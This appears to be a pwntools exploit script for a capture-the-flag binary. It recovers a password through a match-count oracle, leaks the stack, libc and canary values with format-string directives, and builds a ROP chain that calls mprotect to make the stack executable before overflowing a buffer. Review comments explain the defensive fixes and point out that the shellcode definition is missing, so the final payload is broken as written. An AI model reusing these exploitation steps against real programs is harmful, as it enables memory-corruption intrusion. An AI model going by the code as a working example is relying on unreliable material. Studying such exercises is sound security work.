from
pwn
import
*
# Target setup: pwntools context for a 64-bit binary, the local process
# under test, and its libc (used below only for the mprotect symbol offset).
# Verbose 'debug' logging prints every byte sent/received, which is what
# makes the per-attempt oracle in the loop below visible.
context(log_level='debug', arch='amd64')
p = process('./pwn')
libc = ELF('./libc.so.6')

# Thin I/O aliases over the tube; none of them add timeouts or error handling,
# so a hang in the target hangs this script as well.
ru = lambda a: p.readuntil(a)
r = lambda n: p.read(n)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
# Byte-at-a-time password recovery driven by a response oracle.
#
# Each iteration submits the current 10-character guess and reads one byte
# from the target's reply (after skipping 26 bytes of fixed text). That byte
# is treated as "how many leading characters matched": when it equals
# num + 1 the character at position num is accepted and the next position is
# attacked; otherwise the character at position num is bumped by one.
# From a defender's view, this works only because the target reports partial
# match progress -- a comparison that reveals per-character results (or
# its equivalent via an echoed counter) is the root cause; a constant-time,
# all-or-nothing check with no progress output removes the oracle.
#
# NOTE(review): the starting alphabet is 'a' incremented with chr(ord()+1),
# so only characters >= 'a' can ever be found; the script does not bound
# the increment, so it would run past 'z' into non-letter characters.
key = ['a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a']
data = ''
num = 0
while True:
    sla(b'> \n', b'1')
    sa(b'please input your password: \n', ''.join(key))
    # 26 bytes of fixed response text are discarded; the next byte is the
    # oracle value. What exactly the target prints here is not visible from
    # this script -- TODO confirm against the target's output format.
    p.recv(26)
    data = ord(p.recv(1))
    log.success(data)
    if (data == num + 1):
        # position num confirmed; move to the next character
        num += 1
    elif (data == 112):
        # 112 == ord('p'); presumably the first byte of a success message
        # rather than a match count -- verify against the target.
        key_list = ''.join(key)
        log.success(key_list)
        break
    else:
        # wrong character at position num: try the next code point
        key[num] = chr(ord(key[num]) + 1)
# Information leak through a format-string sink.
#
# The three '%N$p' directives are sent as the input that the target then
# passes to a printf-family call as the format argument, so the target
# prints three stack/libc words back as '0x...' text. The fix on the
# target side is the standard one: never use attacker-controlled data as
# the format string (printf("%s", buf), or -Wformat-security at build time).
sa(b'ower!!!\n', b'%10$p' + b'%15$p' + b'%9$p')

# Each leaked pointer is read as exactly 14 characters ("0x" + 12 hex
# digits), the canary as 18 ("0x" + 16 hex digits). This assumes the
# leaked addresses always render with 12 hex digits -- TODO confirm; a
# shorter value would desynchronise the three reads.
stack = int(p.recv(14), 16)
# 0x29d90 is the libc-version-specific distance from the leaked word to the
# library base; it only holds for the exact ./libc.so.6 shipped with the target.
libcbase = int(p.recv(14), 16) - 0x29d90
canary = int(p.recv(18), 16)

# Page-align the leaked stack address: keep "0x" plus the top 9 hex digits
# and zero the low 12 bits, i.e. round down to a 4 KiB boundary.
stack_base = int(str(hex(stack))[0:11] + '000', 16)

log.info('stack => ' + hex(stack))
log.info('libcbase => ' + hex(libcbase))
log.info('canary => ' + hex(canary))
log.info('stack_base => ' + hex(stack_base))
# ROP chain that calls mprotect(stack_base, 0x20000, 7) to make a 128 KiB
# stack region readable/writable/executable, then returns into the payload.
# The gadget offsets are tied to the same libc build as the 0x29d90 offset
# above. Defensive note: this stage needs (a) the canary and stack/libc
# leaks from the format-string bug and (b) an overflow past 0x38 bytes at
# the second prompt; either fix alone breaks it, and a seccomp policy that
# denies mprotect with PROT_EXEC (W^X) blocks this particular chain even
# with both bugs present.
pop_rdi_ret = 0x000000000002a3e5 + libcbase
pop_rsi_ret = 0x000000000002be51 + libcbase
pop_rdx_r12_ret = 0x000000000011f2e7 + libcbase
mprotect = libc.symbols['mprotect'] + libcbase
# NOTE(review): leave_ret is computed but never used in the visible code.
leave_ret = 0x000000000004da83 + libcbase

# NOTE(review): this is a chained assignment -- `shellcode` and `payload`
# are bound to the same ROP bytes. The `asm(shellcode)` call further down
# is therefore applied to those bytes rather than to assembly source; the
# actual shellcode definition appears to be missing from this listing.
# Layout: 0x38 bytes of filler, the recovered canary, a saved-rbp value,
# then the mprotect argument-loading gadgets.
shellcode = payload = b'a' * 0x38 + p64(canary) + p64(stack) + p64(pop_rdi_ret) + p64(stack_base)
# rsi = 0x20000 (length), rdx = 7 (PROT_READ|PROT_WRITE|PROT_EXEC), r12 = 0 (junk for the gadget)
payload += p64(pop_rsi_ret) + p64(0x20000) + p64(pop_rdx_r12_ret) + p64(7) + p64(0)
# After mprotect returns, control goes to stack + 0x30 -- presumably a
# location inside this payload; the exact target depends on the stack
# layout at the time of the leak (not verifiable from this script).
payload += p64(mprotect) + p64(stack + 0x30) + asm(shellcode)

# Deliver the payload at the second menu option and hand the tube to the user.
sla(b'> \n', b'2')
sa(b'dragon!!\n', payload)
p.interactive()